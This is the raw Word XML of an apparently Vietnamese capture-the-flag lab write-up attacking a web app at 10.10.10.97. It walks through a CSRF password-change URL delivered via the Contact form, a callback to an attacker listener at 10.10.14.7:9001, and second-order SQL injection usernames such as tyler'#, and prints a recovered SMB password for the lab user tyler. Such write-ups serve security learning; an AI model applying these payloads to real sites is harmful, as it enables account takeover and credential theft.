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215A9D" w14:textId="1F60701B" w:rsidR="002F49FE" w:rsidRDefault="0039699E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="797EF921" wp14:editId="47563EF8">
            <wp:extent cx="5943600" cy="2564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8B02" w14:textId="5616A557" w:rsidR="00B123BE" w:rsidRDefault="00B123BE"/>
    <w:p w14:paraId="3DD1DDBC" w14:textId="3FCC1179" w:rsidR="00B123BE" w:rsidRPr="002C3244" w:rsidRDefault="002C3244">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C3244">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Web Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C72953" w14:textId="479059A4" w:rsidR="002C3244" w:rsidRDefault="002C3244">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07CBB7A2" w14:textId="3386E0A3" w:rsidR="00537773" w:rsidRDefault="0053777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nhập:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58649EA9" w14:textId="2727A43E" w:rsidR="00537773" w:rsidRDefault="00537773">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36D4B91D" w14:textId="2A0D3BA8" w:rsidR="00537773" w:rsidRDefault="009417E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64C145" wp14:editId="224772D6">
            <wp:extent cx="1948055" cy="1827983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5" t="14950" r="60619" b="35824"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1948723" cy="1828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6738C" w14:textId="6A7BA1B1" w:rsidR="009417E3" w:rsidRDefault="009417E3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23F6E95B" w14:textId="32ABDCEE" w:rsidR="009417E3" w:rsidRDefault="009417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kí:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06476224" w14:textId="7B8CC415" w:rsidR="009417E3" w:rsidRDefault="009417E3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="624B64FE" w14:textId="24AEBAFB" w:rsidR="009417E3" w:rsidRDefault="00BA7C1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480739" wp14:editId="237C42CD">
            <wp:extent cx="2002689" cy="2056493"/>
            <wp:effectExtent l="0" t="0" r="444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4" t="15244" r="59699" b="29378"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2003382" cy="205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1649" w14:textId="367C43FF" w:rsidR="002C3244" w:rsidRDefault="002671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Giao diện trang web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFF57E4" w14:textId="2E807844" w:rsidR="002671F8" w:rsidRPr="002C3244" w:rsidRDefault="002671F8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ABD36D0" w14:textId="4FA9D5F1" w:rsidR="0039699E" w:rsidRDefault="00BA7C19">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78FA601A" wp14:editId="190AD569">
            <wp:extent cx="3886200" cy="2970833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9" t="15537" r="26177" b="27326"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3896186" cy="297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814C40" w14:textId="18571AF4" w:rsidR="00BA7C19" w:rsidRDefault="00BA7C19"/>
    <w:p w14:paraId="3D060F6D" w14:textId="737CBCAA" w:rsidR="0039699E" w:rsidRDefault="004562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Chức năng thay đổi mật khẩu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135EAF7C" w14:textId="327EE6EA" w:rsidR="00456217" w:rsidRDefault="00456217">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="496D61B2" w14:textId="1BC920AB" w:rsidR="00456217" w:rsidRDefault="00CE15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CD34D7" wp14:editId="197AEC54">
            <wp:extent cx="5116195" cy="3174365"/>
            <wp:effectExtent l="0" t="0" r="190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0" t="34290" r="30567" b="12964"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5149342" cy="3194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704E9" w14:textId="2E323568" w:rsidR="00CE1583" w:rsidRDefault="00CE1583">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="242BE15E" w14:textId="77777777" w:rsidR="00EB5DF1" w:rsidRDefault="00EB5DF1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="737B8CD5" w14:textId="77777777" w:rsidR="00EB5DF1" w:rsidRPr="00EB5DF1" w:rsidRDefault="00EB5DF1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB5DF1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cách khai thác thứ 1: CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4251BF" w14:textId="641E24ED" w:rsidR="00CE1583" w:rsidRDefault="0023391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Ứng dụng xử lí phiên dựa theo cookie, không có tham số khó đoán như timestamp hay csrf token</w:t>
      </w:r>
      <w:r w:rsidRPr="0023391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CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686F0247" w14:textId="05B74BF1" w:rsidR="00233918" w:rsidRDefault="00233918">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5986799A" w14:textId="239ABF02" w:rsidR="00CD4B34" w:rsidRDefault="00CD4B3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có thể thay đổi mật khẩu bằng phương thức Get:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1116999E" w14:textId="6AA6A659" w:rsidR="00927EB1" w:rsidRDefault="007416A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48A73C" wp14:editId="117A805A">
            <wp:extent cx="4397829" cy="2724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50" t="33707" r="31114" b="14716"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4420548" cy="2738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FD908" w14:textId="52A99212" w:rsidR="00CD4B34" w:rsidRDefault="007416A2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007416A2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00927EB1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Điều này làm cho khai thác trở nên dễ hơn rất nhiều!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39012926" w14:textId="77777777" w:rsidR="00DA35D6" w:rsidRDefault="00DA35D6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D5D44C5" w14:textId="0D49D5D8" w:rsidR="00DA35D6" w:rsidRDefault="004E512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kiểm tra trang Contact</w:t>
      </w:r>
      <w:r w:rsidR="00DA35D6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C5B14F" w14:textId="77777777" w:rsidR="00DA35D6" w:rsidRDefault="00DA35D6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08BCAB4D" w14:textId="0C2FCBDD" w:rsidR="00DA35D6" w:rsidRDefault="00DA35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http://10.10.14.7:9001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032039A6" w14:textId="62C3D906" w:rsidR="00411D3D" w:rsidRDefault="003F0FD4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E699F11" wp14:editId="222B044E">
            <wp:extent cx="5943600" cy="1830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397A" w14:textId="2E0C9CB0" w:rsidR="004E512C" w:rsidRDefault="00DA35D6" w:rsidP="004A4839">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA35D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Nhận được kết nối từ WindowsPowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC53195" w14:textId="77777777" w:rsidR="004E512C" w:rsidRDefault="004E512C" w:rsidP="004A4839">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21E66B3B" w14:textId="77777777" w:rsidR="004E512C" w:rsidRPr="004E512C" w:rsidRDefault="004E512C" w:rsidP="004E512C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E512C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7038FE67" w14:textId="77777777" w:rsidR="004E512C" w:rsidRDefault="004E512C" w:rsidP="004E512C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E512C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://10.10.10.97/change_pass.php?password=123456&amp;confirm_password=123456&amp;submit=submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9AEE23" w14:textId="5AFC53FF" w:rsidR="00411D3D" w:rsidRDefault="00B917F0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có thể gửi payload ở trang Contact Us</w:t>
      </w:r>
      <w:r w:rsidR="00A70BEA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, người nhận là tyler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9EF89F" w14:textId="65D6C76E" w:rsidR="00B917F0" w:rsidRDefault="00257D2E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66886F3" wp14:editId="7DBDB964">
            <wp:extent cx="3124200" cy="2321412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4" t="15537" r="59150" b="43737"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3132437" cy="2327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B122" w14:textId="51714DF3" w:rsidR="00EB5DF1" w:rsidRDefault="00EB5DF1" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02C85300" w14:textId="0AE922F2" w:rsidR="00EB5DF1" w:rsidRDefault="00EB5DF1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bị lỗi phiên hay sao mà mình đổi mật khẩu của tyler không được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEE4DB8" w14:textId="4D286156" w:rsidR="00EB5DF1" w:rsidRDefault="00EB5DF1" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="212B03C0" w14:textId="717DA2FA" w:rsidR="00EB5DF1" w:rsidRPr="00271B35" w:rsidRDefault="00271B35" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00271B35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Cách khai thác thứ hai: </w:t>
      </w:r>
      <w:r w:rsidR="001B5D94">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Second-Order </w:t>
      </w:r>
      <w:r w:rsidRPr="00271B35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF5ED37" w14:textId="489A5BC1" w:rsidR="00271B35" w:rsidRDefault="00271B35" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="507710BF" w14:textId="5CBF74CF" w:rsidR="001B5D94" w:rsidRDefault="001B5D94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Kịch bản khai thác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F1147F" w14:textId="0C13DEE6" w:rsidR="001B5D94" w:rsidRPr="001B5D94" w:rsidRDefault="001B5D94" w:rsidP="001B5D9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B5D94">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Ứng dụng có trang đăng kí </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715ACB55" w14:textId="72383E1C" w:rsidR="001B5D94" w:rsidRPr="001B5D94" w:rsidRDefault="001B5D94" w:rsidP="001B5D9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B5D94">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Kẻ tấn công tạo 1 tài khoản mới và đăng kí với username </w:t>
      </w:r>
      <w:r w:rsidRPr="001B5D94">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>administrator"</w:t>
      </w:r>
      <w:r w:rsidR="00CE0660">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="001B5D94">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001B5D94">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">password </w:t>
      </w:r>
      <w:r w:rsidRPr="001B5D94">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Admin@123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513EAE6B" w14:textId="45751125" w:rsidR="001B5D94" w:rsidRDefault="001B5D94" w:rsidP="001B5D9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B5D94">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Chương trình có tính năng cập nhật mật khẩu </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371FA457" w14:textId="5E463E89" w:rsidR="00CE0660" w:rsidRDefault="00CE0660" w:rsidP="001B5D94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Vì đầu vào của người dùng không được lọc cẩn thận nên username </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE0660">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>administrator"--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> được lưu trong cơ sở dữ liệu, khi cập nhật mật khẩu nó sẽ thay đổi mật khẩu của administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DA002F" w14:textId="6E4947B4" w:rsidR="00CE0660" w:rsidRDefault="00CE0660" w:rsidP="00CE0660">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C50BB01" w14:textId="158B740F" w:rsidR="00C37B5A" w:rsidRPr="00417E98" w:rsidRDefault="00C37B5A" w:rsidP="00CE0660">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00417E98">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Update Users set </w:t>
      </w:r>
      <w:r w:rsidR="00417E98" w:rsidRPr="00417E98">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>password=</w:t>
      </w:r>
      <w:r w:rsidR="00417E98" w:rsidRPr="00417E98">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00417E98" w:rsidRPr="00417E98">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"newpassword"</w:t>
      </w:r>
      <w:r w:rsidR="00417E98" w:rsidRPr="00417E98">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> where username=</w:t>
      </w:r>
      <w:r w:rsidR="00417E98" w:rsidRPr="00417E98">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"administrator"--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F0337A" w14:textId="16F38280" w:rsidR="00417E98" w:rsidRDefault="00417E98" w:rsidP="00CE0660">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="790F5897" w14:textId="5D2C947A" w:rsidR="00257D2E" w:rsidRDefault="00BE01E8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Áp dụng vào bài lab này: chúng ta có người dùng tyler, tạo một tài khoản mới với thông tin sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AFD281" w14:textId="04567A8B" w:rsidR="00BE01E8" w:rsidRPr="00BE01E8" w:rsidRDefault="00BE01E8" w:rsidP="00BE01E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BE01E8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Username: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE01E8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tyler'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A7D21C" w14:textId="62965207" w:rsidR="00BE01E8" w:rsidRDefault="00BE01E8" w:rsidP="00BE01E8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BE01E8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Password: 123456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD5C92F" w14:textId="01BF5505" w:rsidR="00BE01E8" w:rsidRDefault="00BE01E8" w:rsidP="00BE01E8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="242D58DD" w14:textId="430FECDD" w:rsidR="00BE01E8" w:rsidRDefault="00BE01E8" w:rsidP="00BE01E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Khi đăng nhập thành công, nó sẽ hiển thị các bài notes của tyler:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FEC3EF" w14:textId="4CAF8602" w:rsidR="00BE01E8" w:rsidRDefault="00BE01E8" w:rsidP="00BE01E8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04B4E0EF" w14:textId="3A3EE659" w:rsidR="00BE01E8" w:rsidRPr="00426298" w:rsidRDefault="007871C6" w:rsidP="00BE01E8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00426298">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select * from notes where username=</w:t>
      </w:r>
      <w:r w:rsidRPr="00426298">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00426298">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="00426298">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tyler'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A17A4EC" w14:textId="181EBB3E" w:rsidR="00426298" w:rsidRDefault="00426298" w:rsidP="00BE01E8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E01F444" w14:textId="77777777" w:rsidR="00426298" w:rsidRPr="00BE01E8" w:rsidRDefault="00426298" w:rsidP="00BE01E8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="362D9F38" w14:textId="02C7383B" w:rsidR="00BE01E8" w:rsidRDefault="00426298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44C2024" wp14:editId="5BC980EF">
            <wp:extent cx="5235575" cy="3526971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05" b="5046"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5236029" cy="352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D234" w14:textId="2CC0D329" w:rsidR="005B0E2D" w:rsidRDefault="005B0E2D" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C719432" w14:textId="0815C68A" w:rsidR="005B0E2D" w:rsidRDefault="009C6FD8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các bài notes, có mật khẩu smb của tyler:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175A5D29" w14:textId="77777777" w:rsidR="009C6FD8" w:rsidRDefault="009C6FD8" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70B02B34" w14:textId="160D4D47" w:rsidR="00BE01E8" w:rsidRPr="009C6FD8" w:rsidRDefault="009C6FD8" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6FD8">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tyler / 92g!mA8BGjOirkL%OG*&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DBEAC6" w14:textId="466E54B4" w:rsidR="00B917F0" w:rsidRDefault="009C6FD8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49F375C" wp14:editId="2F9B0EAB">
            <wp:extent cx="5943600" cy="7848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5C8D" w14:textId="4F4F5AEC" w:rsidR="009C6FD8" w:rsidRDefault="009C6FD8" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="325FF770" w14:textId="7349E42E" w:rsidR="009C6FD8" w:rsidRDefault="00CA1E8C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D62ED3" wp14:editId="5D4676D6">
            <wp:extent cx="4927600" cy="213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3B3E4" w14:textId="12D92359" w:rsidR="00CA1E8C" w:rsidRDefault="00CA1E8C" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F2DC801" w14:textId="41FA3719" w:rsidR="00CA1E8C" w:rsidRDefault="00593B45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1AAFCB" wp14:editId="50B81B40">
            <wp:extent cx="5943600" cy="1813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938C" w14:textId="77C9370D" w:rsidR="00593B45" w:rsidRDefault="00593B45" w:rsidP="00411D3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E3350CF" w14:textId="642CA41B" w:rsidR="00437496" w:rsidRDefault="00437496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</w:t>
      </w:r>
